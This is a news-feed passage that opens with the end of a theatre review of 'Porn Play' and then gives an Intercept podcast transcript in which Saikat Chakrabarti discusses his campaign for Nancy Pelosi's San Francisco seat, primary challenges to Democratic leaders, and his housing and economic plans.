Ethical unease … Ambika Mod and Will Close in Porn Play. Photograph: Helen Murray

Ani is a Milton scholar and the drama tussles not just with notions of lost innocence (the alternate meaning of “play” in the title) and the epic poem’s sexual politics but also the question of separating the art from the author’s behaviour. That ethical argument bleeds into Ani’s distinction between watching violent pornography (“it’s all fake”) and her IRL views of women and the world. The porn on Ani’s screens is shown in abstract, highlighting how the footage itself is almost inconsequential, and is matched by the thrumming, distorted ecstasy of Helen Skiera’s score.

The ambitious balance of tragedy, horror and comedy is best in a painful scene where Ani’s boyfriend holds the phone for her while she masturbates. It does not quite come off in a gynaecological appointment (for which a whole gurney is extracted from beneath the set) where Ani’s shame is voiced by her doctor.

Will Close, Lizzy Connolly and Asif Khan deftly handle multiple supporting roles between them in a show with sharply delineated movement direction by Wayne McGregor . The play’s strands are directly tied together through Ani and her father’s climactic speeches in the sort of ending that can often feel forced but is greatly persuasive here. It’s a play that confirms Chetin-Leuner as a clear-sighted yet sanguine chronicler of all manner of relationships, not least with ourselves.

Saikat Chakrabarti’s Plan for the Political Revolution

Intercept
theintercept.com
2025-11-14 11:00:00
AOC’s former chief of staff wants to primary the Democratic establishment. The post Saikat Chakrabarti’s Plan for the Political Revolution appeared first on The Intercept....
Original Article

It’s the end of an era. Rep. Nancy Pelosi, D-Calif., who counts among her legacies in Congress successfully undercutting the push for Medicare for All, announced last week that she is retiring from Congress. The two-time former speaker of the House made her announcement after Democrats made remarkable gains in nationwide elections, campaigning on affordability and standing up to the Trump administration.

“We are in this era where we need new ideas, we need new leaders, we need people who are going to push the party in a new direction,” says Saikat Chakrabarti, who is running to replace Pelosi and represent San Francisco in Congress, making economic inequality and corporate power the focal point of his politics. This week on The Intercept Briefing, host Akela Lacy speaks to Chakrabarti, the co-founder of the progressive outfit Justice Democrats who helped run the primary campaign of one of its first candidates, Rep. Alexandria Ocasio-Cortez, becoming her first chief of staff .

Answering Lacy’s question as to how he’ll get it done, Chakrabarti says, “In the 1930s, we had a really powerful, far right in this country. We were actually seeing Nazi rallies in Madison Square Garden, it was filling the stadium. And the way we defeated that was FDR came in with the New Deal movement. He built this whole new economy and a whole new society that improved people’s lives so dramatically, it just killed this idea that you need an authoritarian to do it for you.” FDR “wasn’t advocating for going back to a pre-Great Depression era. He was advocating for something new. So that’s the way we get it done, and I see some movement towards that.”

Chakrabarti has been openly calling for House Minority Leader Hakeem Jeffries, D-N.Y., to be primaried and tells The Intercept that Senate Minority Leader Chuck Schumer should be too, following the end of the longest government shutdown in U.S. history, after eight Democratic senators — none who are up for reelection — joined forces with Republicans to pass a spending package.

“My goal, honestly, is to replace a huge part of the Democrat establishment,” says Chakrabarti. “I’m calling for primaries all across the country. … I think we actually have to get in there and be in a position of power where we can do all that, so it’s not going to be this constant compromising with the establishment, trying to figure out how we can push.” He adds, “I tried the pushing strategy — that’s what Justice Democrats was: We were trying to elect people to try to push the Democratic Party to do the right thing. It’s not going to work. We have to replace them.”

Listen to the full conversation of The Intercept Briefing on Apple Podcasts , Spotify , or wherever you listen.

Transcript

Akela Lacy: Welcome to The Intercept Briefing, I’m Akela Lacy.

It’s the end of an era.

Nancy Pelosi : I will not be seeking reelection to Congress.

AL: U.S. Representative Nancy Pelosi, who counts among her legacies in Congress successfully undercutting the push for Medicare for All, announced last week that she’s retiring from Congress. The Democrat and two-time former speaker of the House represents one of the country’s most liberal districts: San Francisco, California. And she has done so for nearly 40 years .

Pelosi made her announcement after Democrats made remarkable gains in nationwide elections. One takeaway, as we discussed in last week’s episode, is that voters want leaders who will fight for affordability and stand up to the Trump administration.

The race to replace Pelosi began before she publicly shared that she would not run for reelection. And although the California primary is seven months away, it’s already looking like a crowded and competitive field.

Saikat Chakrabarti was the first to jump into the race for Pelosi’s seat, setting up a challenge from her left.

Chakrabarti co-founded the progressive outfit Justice Democrats and helped run the first campaign and office of one of its first candidates: Rep. Alexandria Ocasio-Cortez.

He’s running on a campaign promising to push for universal health care and child care, enact a stock trading ban for members of Congress, cost-of-living issues, and to “stop funding the genocide in Gaza.”

He’s also criticized some of his colleagues in the progressive movement. So how is he positioning himself amid a wave of other primary challengers? And how would he actually fulfill his campaign promises? Saikat Chakrabarti joins me now. Saikat, welcome to the Intercept Briefing.

​​ Saikat Chakrabarti: Hey, thanks for having me.

AL: ​​Saikat, you’ve been described as a bit of a contradiction. You’re independently wealthy; you’re a founding engineer at the payment processing company Stripe; and Business Insider has said, you may be wealthier than Nancy Pelosi, one of the wealthiest members of Congress.

You’ve also made economic inequality and corporate power the focal point of your politics. You ran Alexandria Ocasio-Cortez’s campaign, became her first chief of staff , and co-founded Justice Democrats.

Most tech millionaires aren’t necessarily also progressive anti-establishment politicians. How do those two identities fit together for you?

SC: I’d say most tech millionaires are really working toward their own demise as well in the long run. Because, I mean, look, I’ll give you my whole background. I grew up middle class in Texas. I grew up going to public schools. My parents actually grew up fairly poor. My parents are from India. They immigrated here in the 1970s, and my dad was a victim of partition, which was a catastrophic event — we basically split up India along religious lines after the Indian Revolution. And so his family were refugees that had to flee overnight from Bangladesh over to India. And so I grew up with the stories of their struggles. My dad grew up with a family of 12 in a one-bedroom apartment, often didn’t know where his next meal would be coming from.

I’d say my values really come from that — in two ways. Like one, it’s both these values that are shaped by how hard people who are totally capable have to actually work when they get a bad plate handed to them in life. But also just the way our economy is set up and has been set for so long is a lottery. Because at the end of the day, my dad struggled, but he won a lottery ticket; he got a visa to come to America. And I go back to Calcutta and I meet his friends and his family who all had it just as hard or just as hard-working, just as capable people who never made it out.

And so I joined the tech industry back in 2007, or 2009, actually, after college. And it was a time when tech really was being pitched as a solution to a lot of the big problems in the world. I was a completely apolitical person, and I bought it. I did think I was going in to try to solve some big issues. At the time like Muhammad Yunus was doing microfinance to alleviate poverty, yada, yada. And living in San Francisco and seeing unhoused people on the streets while I’m going to my tech job — it just gave me the feeling that maybe I’m actually not solving the problems I really want to work on.

So it sounds really cheesy now, but I quit the tech industry and I wrote a list. I was like, I want to work on inequality, poverty, and climate change. Again, I was not political at all — I was looking at mainly working in nonprofits. And that was around the time Bernie Sanders started running for president. I didn’t know if he had all the answers, but he was talking about those things in a very compelling way.

And so I joined that, and I ended up working on the Bernie campaign. I started a group — Justice Democrats — to recruit people to run on progressive values all around the country. And that’s how I ended up recruiting AOC to run, and ran her campaign, and ended up as her chief of staff.

But I really believe at the end of the day, like a fundamental thing — and this is why I don’t think it is a contradiction — I experienced that lottery economy that the startup economy really is in San Francisco. It’s this system where you can just hit it big if you just happen to be in the right place at the right time.

That’s what happened to me. And like I worked hard, but I did not work harder than a teacher or a nurse or the people cleaning our offices did every single day. I just won the startup lottery — and that to me is wild, to have an economy set up like that where you can just win a lottery and never have to work again.

While to most people actually running society, working hard to run society, we’re saying, “You’re never going to be able to afford a house. You’re never going to be able to have a secure retirement.” I think a society and economy set up like that is doomed to fail. I think that is the ultimate demise of America.

And I’d say to people who are in my position, who have wealth, who don’t see it that way, who aren’t willing to just accept some taxes on themselves to make an economy that actually works for everybody — you’re being shortsighted because this won’t end up good for you either, if you end up in a society that’s a complete dystopia, that’s completely unequal.

“You’re being shortsighted because this won’t end up good for you either, if you end up in a society that’s a complete dystopia.”

AL: Speaking of the people on whose backs the society runs, as we’re speaking, the longest government shutdown ever is on the verge of ending after eight Democratic senators decided to join forces with Republicans to pass a spending package.

For years, you’ve been critical of Democrats, saying they’re too weak, too compromising, too establishment. Do you think they should have ended the shutdown without a healthcare guarantee?

SC: No. I mean, this has been my main critique of the party for so long. A lot of my critique is on the policies and what they actually want to do and what they want to stand for.

“Strategically, they preemptively cave.”

But a big part of my critique is, strategically, they preemptively cave, and this was a prime example of that. I mean, not through any leadership by Schumer or Hakeem Jeffries, but we were actually winning on this fight. And it’s not like, I don’t think this is a political fight. We were actually fighting for once to deliver something real for people who are suffering in this economy right now.

This economy sucks, and we’re talking about doubling or tripling people’s health insurance premiums in the middle of this, right? So Democrats were winning that messaging. You saw it in the polling, you saw public sentiment on the shutdown going towards Democrats. And then we’re coming off the back of a massive electoral victory last Tuesday where Donald Trump actually went on TV and said, you know, he was saying part of that was because Republicans were losing the messaging on the shutdown fight. So, I mean, call me naive but honestly, I thought like, “OK, finally we have the leverage, we have the upper hand. Maybe Democrats will realize they can push.”

So watching them cave, I mean, oh my God, why? Like, why? You’re winning. You could have actually delivered something and then you could have gone into the next election and said, “We fought Trump and we won.” Because right now, I think the main reason people don’t want to vote for Democrats — part of it’s the policy, but part of it’s, they’re weak! Do you want to vote for people who aren’t going to get shit done for you? No. So this just proved, I think, that image to a bunch of people.

“I’m not seeing Democrats go out there and persuade the public in the way that I saw Dick Cheney and George Bush persuade the public to go to war in Iraq, which was actually an unpopular thing to do.”

So no, they absolutely should have kept fighting. I think they could have won. And honestly, in my opinion, if we had seen Hakeem Jeffries and Schumer and some of the Democratic leaders actually fighting way more — because my big critique of this whole fight was, I’m not seeing it be front-page news every single day. I’m not seeing Democrats go out there and persuade the public in the way that I saw Dick Cheney and George Bush persuade the public to go to war in Iraq, which was actually an unpopular thing to do. If we had used that sort of tactic, I think we could have ended the shutdown way earlier, because Trump’s numbers on this would’ve been plummeting way faster, and we would’ve actually gotten something done for people. That’s the part that pisses me off.

AL: You’re touching a little bit on sort of this tension between the inside-outside strategy versus pushing for everything that you possibly can for responding to constituents. On this topic, Alexandria Ocasio-Cortez has faced criticism for what some say has been a moderation in her approach: speaking on the DNC stage, saying Kamala Harris worked “tirelessly for a ceasefire” in Gaza. What’s your response to that and how do you see yourself navigating that inside-outside game if you’re elected?

SC: Look, I think, AOC, she’s kind of alone in there, right? Like there’s only a few, a handful of progressives in Congress right now. And I think they’re all trying to do the best they can with a limited amount of power. And that means trying to push the agenda, trying to push from the inside and working with outside organizations to create pressure.

My goal, honestly, is to replace a huge part of the Democrat establishment. I’ve been very clear about that from the start. I’m calling for primaries all across the country. I’m trying to recruit people to run across the country, and I’m talking to folks who are stepping up and challenging the establishment right now across the country. I think we actually have to get in there and be in a position of power where we can do all that so it’s not going to be this constant compromising with the establishment, trying to figure out how we can push.

I tried the pushing strategy — that’s what Justice Democrats was: We were trying to elect people to try to push the Democratic Party to do the right thing. It’s not going to work. We have to replace them. We just have to replace them. And that’s, you know, to me that’s where I’m headed. That’s my politics.

“It’s because the American Dream has been shattered. Children today are not going to do as well as their parents.”

I think it’s not just existential for the party; I think it’s existential for the country. Because ultimately, I think people have been voting for anybody who’s standing for bold, sweeping economic change ever since the Great Recession. I’d say that was why Barack Obama got elected. I think that’s why Donald Trump got elected. And it’s for good reason. It’s because the American Dream has been shattered. Children today are not going to do as well as their parents. People’s wages have been stagnant for decades while the cost of essentials is going up.

And so what we see is people are really open to the kind of change, but all they know is that the status quo is not cutting it. So Trump has a version of what that change is: MAGA. It’s saying, “You can’t afford a house, you can’t afford a secure retirement because of immigrants, because of our attention to people in foreign countries, because of trans people or scientists,” what have you.

And we have to present an actual vision and a plan on the other side, and then deliver on that plan to improve people’s lives. And that’s not going to happen by pushing people to get on the right policies. It’s going to be a whole movement that has to take power and make it happen — put the country on a path to implementing something like that.

AL: In this vein, you have talked openly, as you are now, about the fact that the first Squad members who came into Congress have only been able to do so much because of a lack of broader organization among progressives. One of the key proposals you’ve been working on for the last few years is what some people are calling the “Green New Deal on steroids” — a successor to the Green New Deal that you led work on as AOC’s chief of staff. What are your plans, and how do you think you can bring them to fruition where other progressive policy priorities have so far failed?

SC: So the thing I’ve been working on at my think tank New Consensus, we’re calling it the “Mission for America.” And it really harkens back to basically what FDR did during the New Deal, but also during the mobilization for World War II, to build a whole new economy, because I think that’s ultimately the way we defeat authoritarianism. Because back in the 1930s, we had a really powerful far right in this country. We were actually seeing Nazi rallies in Madison Square Garden; they were filling the stadium.

And the way we defeated that was FDR came in with the New Deal movement. He built this whole new economy and a whole new society that improved people’s lives so dramatically, it just killed this idea that you need an authoritarian to do it for you.

“It just killed this idea that you need an authoritarian to do it for you.”

He proved democracy can work. And he did that through the social safety net. But he also did that by building an industrial base that created the modern-day middle class. So that’s really what the “Mission for America” is. It’s basically taking a lot of the institutions and the lessons from that era and saying, how do we do that today? Because I argue that it’s not just about some policies; it’s actually this whole other kind of governing that we had back then. This is going to get a little bit in the weeds — but we’re on a podcast, so I’m going to go there, all right?

AL: Go for it.

SC: So when you look at the way we used to govern in that era, it wasn’t just like FDR came in with his, like, three policies that are going to pass. No. It was a whole new framework for how to envision society. And he put the government into this mode that we’ve been calling “mission mode.” And in mission mode, it’s really different from how we govern today in three really distinct ways.

One is, you have a leader who actively puts the country on a mission and then follows up: makes civil society join in on the mission, persuades, uses action as a way to create political capital. So FDR did this through his fireside chats, but he also was very active in actually going out and recruiting CEOs to be a part of it. And if CEOs were standing in the way, he would call them out and kind of vilify them publicly as well, if they were actually just preferring short-term profit over long-term prosperity.

And the second piece is, in mission mode, you make comprehensive plans. So you say, “This is where we’re getting to,” and then you deliver those plans. You don’t just pass some policies and then take your hands off the steering wheel; that’s how we govern today.

And the third piece is, you create institutions to finance and coordinate and execute those plans. We used to have a whole bunch of institutions like this all across our society.

We had public banks in every state. The largest by far was an institution called the Reconstruction Finance Corporation — that was kinda the engine of growth during the New Deal and the World War II mobilization. But after the war, we started dismantling all these planning and financing institutions for a whole bunch of reasons (I can get into that), but I think we’ve just forgotten that whole playbook.

And so the “Mission for America” is this playbook that is a tried-and-true playbook — because it wasn’t just America. After the war, Europe used this playbook to get rich. All the Asian countries used a similar playbook to develop in the ’70s and ’80s and ’90s. They actually called it the American system.

“After the war, Europe used this playbook to get rich. All the Asian countries used a similar playbook to develop in the ’70s and ’80s and ’90s. They actually called it the American system.”

And so we got to do that again to actually show this other route to developing our economy, so that the authoritarians don’t win. So the answer to “How do you get it done?” It has to be, like, I’m imagining we’re going into 2028, somebody running for president. We got hundreds of people who are running for Congress who are lined up on this overall vision, the same way FDR came in with a whole new New Deal movement. He wasn’t advocating for going back to a pre-Great Depression era. He was advocating for something new. So that’s the way we get it done, and I see some movement towards that.

I will say, I think some of the pieces of this have already become sort of common sense. Things like industrial policy; the Green New Deal managed to get that into the lexicon. The idea that we actually need to focus on the cost-of-living crisis, but not just say affordability — because plenty of Democrats say affordability — it has to be backed up with real policy. I think that’s why you had Zohran win in New York. But it’s also why you had Mikie Sherrill win in New Jersey, because she was calling for rate hike freezes against utilities and calling out the corporations that were getting in the way. So you need some substance. It’s not just messaging. You need substance.

But yeah, the answer at the end of the day is, we have to have a movement that’s really dedicated to doing this all the way, who aren’t bought out by the corporations. That’s another piece of it, right? You’re not sold out, and you’re not just in there to build a political career for yourself, which is what most people in Congress are.

AL: I want to ask you a little bit about how you view the timing on this, because we’re talking about 2028. Right now, most Americans are thinking about, “How do I get through a day with the terror and chaos that is the second iteration of the Trump administration?”

You’ve also said that Justice Democrats in some ways was before its time, but that you feel like now there is momentum here. Why do you think right now is the time for this — particularly if you’re talking about two to three years in the future, where we have no idea what the political landscape is going to look like?

And right now, obviously this is timely for your race, the disappointment with the Democratic Party is at an all-time high, but we don’t know where it’s going to be in 2028.

SC: So I want to be clear, like the reason I’m talking about 2028 is, in 2026, we’re still going to have Trump as president, and I think the real work for 2026 is to start building this movement. And to actually get victories and get new people in there, and use that as a jumping-off point to doing the larger stuff and defining what 2028 is going to be. That’s going to be part of it. And actually stopping this coup — like that’s something I haven’t even touched on yet. But we actually need people in there who know how to stop what’s happening, who know how to stop the authoritarianism. Because if we don’t have fair and free elections in 2028, it’s game over anyway, right? So we actually have to stop that.

But why do I think it’s possible now? I’m seeing it in the campaign. Like in 2018, it was a similar moment. Trump had just won in 2016. A lot of Democrats were really frustrated with the party. Democrats were looking for what comes next. But a lot of people also thought it was maybe a fluke. And I’d say when we were working on all those Justice Democrats races in 2018, it was largely progressive activists coming out, progressive activists who were getting involved, but also a lot of new progressive activists who were coming into the fold.

Right now, what I’m seeing in the race is — you know, I do these calls with voters in San Francisco every day; anyone can go to my website and sign up for a video call with me. The kinds of people showing up to those calls, it’s not just progressive activists. It’s like lifelong Pelosi voters; some mainstream Democrats; people who thought 2016 was a fluke but then Trump just won again and they’re like, clearly something is wrong. And they’re looking for those answers.

“In 2018, it was a similar moment. Trump had just won in 2016.”

And we just did a rally a couple of weeks ago in the Mission, and we had 800 people show up. It was so many people we couldn’t fit them in. And this is like almost a year out from the election. That kind of energy I did not see in 2018. So I think this is just a very different moment. The polling bears it out too. If you look at the Democratic Party’s polling amongst its own base against Trump, I mean, we’re polling worse than Trump, right?

So the party’s in an existential crisis. It has to be new people leading the party, and I’d say the mainstream of the party realizes that. So that’s, I think, the opportunity — because we’re in such a crisis. But yeah, I agree with you. In the short term, the problem is, how do you keep this coup from actually happening? And what can we actually do in the short term to actually fight where we have leverage, like on this frickin’ Senate budget bill?

AL: On this, I want to push on this authoritarian thing — because what would you be doing, or what would you want to see Democrats in Congress doing that they’re not doing right now to stop Trump from doing what he’s doing, particularly in the minority?

SC: Yeah, I think it boils down to three big things. One, I do think Democrats in positions of power could actually be showing up when, say, ICE is in our cities, kidnapping people off the streets. You have some privilege in your power. We saw [Mayor] Karen Bass do this to an extent in LA when ICE was rolling through MacArthur Park. She showed up and she said, “I’m not leaving until you do.” She put the ball in their court to escalate. So do it nonviolently, but you put it on them to escalate, and they really weren’t willing to go there.

I think the second piece is, Democrats need to realize that their position as opposition leaders right now is not just about writing policy and legislation. We actually need to organize civil society. I think the bulwark against fascism is civil society. So what I mean by that is, when Trump’s going after law firms or media companies or universities, he’s going after them one at a time, and they fall like dominoes; it’s easy. But if they could actually organize as collective blocs, they could be a real opposition.

I’ve talked to some people who work at law firms who’ve been trying to do that. It’s very difficult for them to organize each other as peers. But if you have political backing behind you, if you have a legislator who’s actually trying to organize you, I think that’s something you do. Or similarly, like you see AOC or Bernie going around, doing the anti-oligarchy tour, drawing big crowds. Turn that into a real citizen force to be an actual bulwark against fascism.

“The way authoritarianism works, it’s this constant process of them trying to make the abnormal normal.”

But the third piece I’d say is a bit on messaging. It’s like when Trump oversteps his bounds, call it out and stick with it. And we saw this happen with Kilmar Ábrego García where Trump deported him to CECOT and then [Sen.] Chris Van Hollen, D-Md., went down there and wouldn’t leave and just stuck with it. And then Trump started seeing his numbers go down, and he got sent back.

And it’s just this thing where, like the way authoritarianism works, it’s this constant process of them trying to make the abnormal normal. They’re pushing this tide and we have to be the force that’s constantly pushing that tide back, calling it out, keeping things abnormal abnormal. Because if we let them just do it — before we know it, it’s normal for them to own all the county election boards. It’s normal for them to own all the election machines. And it’s normal for them to stuff the ballot boxes, and then it’s game over. Right. So it’s daily work. It’s daily work. You just have to be fighting every single frickin’ day.

[Break]

AL: Switching gears to affordability, which you touched on a little earlier. This issue, cost of living, is top of mind for many, many voters, and you’ve said, “building millions of units of affordable housing and social housing” is a priority for you. How would you try to achieve that, especially running in one of the country’s most expensive cities to live in? And I sympathize, speaking to you from New York.

SC: Yes, you’re probably the second most expensive. But I really think the way we need to be thinking about housing is as infrastructure. You know, the way we think about building out our road systems or the way we think about building out our power grids. So what we actually need is real plans for the housing we have to build, and then to have every tool available to us to make it happen.

So part of that means the government directly funding and building social housing. Right now, it’s actually illegal for the government to build new public housing because of something called the Faircloth Amendment. So we should repeal that. But the other piece of this is like, we don’t have the institutions, like we don’t have a public bank that can directly finance social housing. And that’s something that I call for recreating.

Things like, right now, material costs are really high. Well, if we had something like a modern-day version of the Reconstruction Finance Corporation that FDR had, like I was talking about, which is something I call for, we could do things like stockpile materials when costs are low, so that we can try to keep inflation from hitting housing construction costs.

So it’s just this whole-of-society approach to try to just tackle this problem and actually build housing. Because building housing is not an impossible task. We’ve been doing it for hundreds of years, right? It’s just this matter of, we currently have this approach of, let’s do some deregulation there, let’s, you know, do some policy reforms there, and then see if the private markets will handle it.

And I’m not someone who’s against making it easier and cheaper to construct housing. I absolutely think that’s also a problem in my city. And I think that’s also a problem in New York. And the way Zohran talked about this was: We gotta cut red tape, build affordable housing, and freeze the rent. Right? That’s basically my approach: we actually need to make it easier to construct housing, build the housing, and then the other piece of it is actually getting control of costs. Getting control of speculation. That’s another piece I didn’t touch on, but getting control of hedge funds and private equity coming in, buying up housing, propping up the market, and making it unaffordable.

AL: How do you define social housing? I just want to clarify here.

SC: Yeah. Lots of ways to potentially define it. Yeah, that’s a good question.

So one route here is I think the government should have a public developer that can straight up go out and build the housing, right? That’s just something that we currently don’t have in our tool chest. State-owned corporations, for some reason, are supposed to be a taboo thing. It makes no sense.

We used to have it before. Plenty of countries do it this way. But also I think there are options for the government to, say, take equity stakes in housing developments as a way to control pricing there. Right? And that’s a model we saw in Montgomery County that’s worked really well for them.

But it boils down to, like, an all-of-the-above approach to making sure the housing gets built and that it’s actually affordable and people of all income levels can live in it.

AL: You’ve touched on sort of changing the mindset and the way that we think about this, and instead of doing piecemeal deregulation, thinking about this as a larger institutional shift. But why do you think you’ll be successful, given that this is something that people have been trying to solve for years, particularly in San Francisco — the housing crisis?

SC: Again, I think it boils down to whether we can have a mindset shift in the entire Democratic Party on how we approach not just housing but all of our problems, because this is sort of the theme of the larger idea I’m trying to push here: How do you solve problems in society in general? Like if we want to build a new clean energy economy, it’s not going to work to just do some tax incentives and do some deregulation here and there. You actually have to have a plan, a goal, milestones, and then use tools like financing and public developers and everything else you need to hit that goal. Execution matters just as much as, if not more than, passing the policies. And this is just, you know, I do have some experience getting these new ideas across the finish line through things like the Green New Deal.

That’s the approach I’m going to take with something like this: I just got to get the ideas to happen, and I want to recruit a movement of people who believe in this approach. I think it’s the approach that works, the approach that’s worked historically. But yeah, I mean, I think the answer is we need new leaders who are willing to actually care about solutions and not just fundraising.

AL: Relatedly, you talked a little bit about this in terms of your political development. San Francisco has been a bit of a dog whistle for the Trump administration on issues of crime and homelessness and addiction. I think back to the recall of District Attorney Chesa Boudin. I mean, where do you fall here, and how would you respond to that kind of targeting if you represented this district in Congress? Because it sounds like you’re saying there are some elements of truth to this, and there are some elements that are Trump machinations, but where do you fall here?

SC: Yeah. I mean, I honestly get really pissed off when I do see kind of essentially caricatures of this city, because if you come here, I mean, it’s an amazing city. It’s the greatest city on earth. It’s beautiful. Most of the city is doing great, but of course we have some problems.

But I am a big believer that if you look at the problems that we have, you really see versions of them everywhere. We have them particularly hard here because things like inequality and the cost of living are worse in San Francisco, and I think that’s the root cause of a lot of the issues that we see, whether it’s the homelessness we see on the streets, or even the drug addiction and mental health crises we see on the streets. But it’s really going on all over the country. I think we have to actually solve these larger structural issues at a national level.

And this is something I’m really trying to get across in my campaign: these are not problems San Francisco created on its own, and they’re not problems San Francisco’s going to be able to solve on its own. Just to take one example. You know, if you look at our city budget, the largest driver of costs for our city employees is healthcare benefits. And the only answer a city can have to that is cutting more and more services, right? Like that’s basically the approach we have, because the city has to balance its budget. So we have to solve healthcare at a national level if we want to save our cities.

And that’s why I’m talking about these structural things that we have to do at a national level, things that I think both parties have just ignored for decades until it’s come to a breaking point. So, yeah, I think that’s the way we tackle San Francisco’s biggest problems.

AL: One of the moderate groups that helped shape the 2022 recalls of Chesa Boudin and several San Francisco school board members, GrowSF, has said you might have a shot at winning, particularly if you focus on issues that matter to moderate voters in San Francisco. What do you make of that?

SC: You know, I don’t think it’s about progressive versus moderate. And this is kind of my take on the country as a whole. I really think you’re just going to keep getting backlash politics to dysfunction and failure of governance. And I think that’s really what we saw in San Francisco.

I think when you look at the recall elections that happened, it was a reaction to just general dysfunction in the city government. It was a reaction to COVID, honestly, resulting in a lot of disorder on our streets. And my view on it is, yeah, we elected a new “moderate government,” but if they fail to actually govern well, there’s going to be a backlash to that as well.

And nationally, I’m seeing this in the same way that you see people voting for Obama and then Trump, and then Biden, and then Trump again. It’s just that nothing is working. People are looking for change. They’re looking for real structural solutions to these big problems. So I agree with GrowSF that I do have a shot: I’m going to win this race.

But I don’t think it’s just about appealing to moderate voters. If you ask most voters, of course, most voters will say they’re moderate, but if you ask them, like, “What do you think needs to happen?” views are actually all over the place. But the thing that they’re right about is you do have to talk about the real issues that are affecting people’s lives and how you’re actually going to solve them.

So I would argue everything I’m talking about solving those issues, they’re all overwhelmingly popular. So I guess definitionally, they’re moderate or centrist, who knows? But they’re also, you know, they make sense. They’re just practical.

AL: I want to talk about the Democratic Socialists of America. On the national stage, they’re having a huge moment after Zohran Mamdani’s success in New York. He’s one of the hottest politicians in the country right now. And some of your supporters and other people have compared you to him. Even though it’s a national brand, DSA is made up of local chapters, and the San Francisco DSA has bristled at that comparison between yourself and Mamdani, pointing out that you supported a local centrist Democrat who ousted the only Democratic socialist on the San Francisco Board of Supervisors. Are you trying to court DSA’s support, and if so, how do you plan to get them on your side? And if not, why not?

SC: Yeah. I mean, basically, the way I run my campaigns every time is I run on what I’m running on and if people want to support that, great. I’ll always talk to everybody, right? Like I’ll of course talk to DSA San Francisco. I’ll talk to other folks as well. But to kind of talk about, you know, the specific thing DSA San Francisco is upset about, like, I would not say the person I supported was a centrist.

I backed him because I’ve known him for a while. We worked together on legislation in the state. We wrote an op-ed together about a Green New Deal for California. And, you know, since being elected, I haven’t agreed with everything he’s done. But I really think he is a good guy who’s a progressive, who was trying to chart this path that was about how do we actually do progressive things. He was good on criminal justice reform while also making sure we’re building housing in the city, especially affordable housing as well. And I think he’s a real problem solver, you know. And it’s interesting, in the past, he actually got a lot of crap from the “abundant YIMBY” people because he was supporting the progressive in one of their races, right? So he was trying to chart this new path and I think that’s admirable.

That’s like something I would like to do as well. We can’t— I think we have this weird polarization, especially in San Francisco between these two factions and there is a version of the YIMBY faction that’s just like, you know, neoliberalism, like “let’s just deregulate; let the private markets rip.” I don’t agree with that, but I think there’s a lot of folks who actually want to use every tool to make sure we’re building all the housing we need. And similarly, in DSA, I have a lot of folks from DSA who are volunteering on the campaign and it seems like there’s a split there too, where there’s some folks who are a bit more like, you know, YIMBY-DSA people, right?

And I’d argue Zohran is kind of in that camp. So, yeah, I mean, I’m not going to shy away from saying I like what Zohran did, because I like what he did. You know, I’m not trying to say I’m Zohran at all. But it’s very exciting to me to see him win. But at the end of the day, I am trying to run in perhaps a new lane of politics.

Like we actually have to do the things like expand the social safety net. We actually have to do things like Medicare for All, and we have to build industry, we have to build housing, we have to do all of these building projects to make life better for people.

Now, one thing that sometimes gets conflated with this is, you know, the influence of tech money and oligarchy in both national politics and locally. And I want to be clear, that is a bad thing that has a corrupting influence. And in that election where I supported Bilal [Mahmood], he was very clear that he doesn’t want Elon Musk. I mean, it sucks that, like, the tech fascists were trying to get involved in that election, but Bilal told Elon to go fuck himself.

And so I want to be clear that they are my enemy, right? Like the fascists who have lined up with Donald Trump — Peter Thiel, Elon Musk, David Sacks — they are doing a craven project of cowardice where they’re just engaging in political opportunism to enrich themselves, and they absolutely have to be called out on that and cut out from power in the long run.

But I do hope we can get to a place where we are actually solving these problems.

AL: I have to ask, because you mentioned it. What is your abundance take?

SC: It’s, yeah, I mean, I did a long podcast with Ezra Klein on it. But I mean, look, when we did the Green New Deal, that was abundance, like we were talking about; we got to actually do energy abundance. We have to actually do this to create high-wage industries so people have tens of millions of jobs. But my argument, my critique of the abundance folks, is that a lot of the times I see them falling into a camp of, “Oh, if we just did the exact right permitting reform or zoning reform or deregulation, we would get abundance.” And I think that’s completely unrealistic.

If you look at the history of every country that’s ever developed their economies — and I’m talking about all of post-war Europe, all the Asian countries, America during the World War II mobilization — it has never happened by just having the right permitting, you know, guidelines. You actually have to do this mission driven approach, which has been what I’ve been pushing for the last decade in my politics. It really is how do you actually do it, which is huge amounts of state capacity, public financing, comprehensive plans. You set the country on a mission and you just go for it.

So that’s my answer is like, yeah, I mean, great, like I would be all for getting rid of the counterproductive regulations that currently get in the way of building things that everybody needs. But that’s not going to be enough. You know, it’s not even going to be close to enough. We have to do way more than that, if we are serious about abundance.

AL: The race to win the San Francisco district is already shaping up to be competitive among Democrats. The most widely recognized of the candidates, State Senator Scott Wiener, announced his candidacy last month. In Sacramento, Wiener has fought to increase housing density and protect transgender rights. Supervisor Connie Chan has not officially thrown her hat in the ring but is believed to be considering a run and could potentially secure the support of the city’s most powerful unions. Former San Francisco Mayor London Breed has also said she’s considering a run. What makes you stand out from the pack? You haven’t held public office before; why do you think you’re the right person for the job now?

SC: Yeah, I mean, first off, I’m the only one here that’s talking about actually doing the political revolution inside the party to get us to a point where we can do the big structural changes.

I don’t know what the theory of change is for any of these other folks who are running, because what are you going to do? You know, someone like Senator Wiener or any of the folks running, like if you’re just going to go in and be another Democrat in the current system and not talk about changing the system, what are you going to actually accomplish? How are you going to accomplish anything? I don’t know. You know, maybe they have some answer to that, but I haven’t heard it.

And I’d say the other piece of this is where I do have a difference from someone like Senator Wiener. I mean, Senator Wiener has been in government in San Francisco in some form for the last 14 years. And his main focus has been housing. And in that time, I mean, rents in San Francisco have more than doubled. We have a housing crisis. I wouldn’t say he’s been successful in the outcomes on what his focus has been. But also, it’s really different to be a state senator in a largely Democratic Sacramento, where you’re passing some legislative reforms here and there.

I’d say in Congress, we have to figure out how to get past the gridlock. And that is what I have experience doing. I mean, I was in charge of writing and launching the Green New Deal as AOC’s chief of staff, and that wasn’t just a policy that we were trying to pass. It was a political strategy, because at that time, the entire Democratic caucus was just trying to talk about carbon taxes and cap and trade. And we came in and said, A, actually, this is not going to do anything for climate change. But B, it’s politically stupid. You’re talking about punishing people as a way to solve climate change. What we actually need to do is talk about building the clean, high-wage, high-tech industries that’ll create tens of millions of jobs. The crisis of climate change is in fact the greatest opportunity of our generation to reverse decades of economic devastation. And we were saying the plans out there were just way too small.

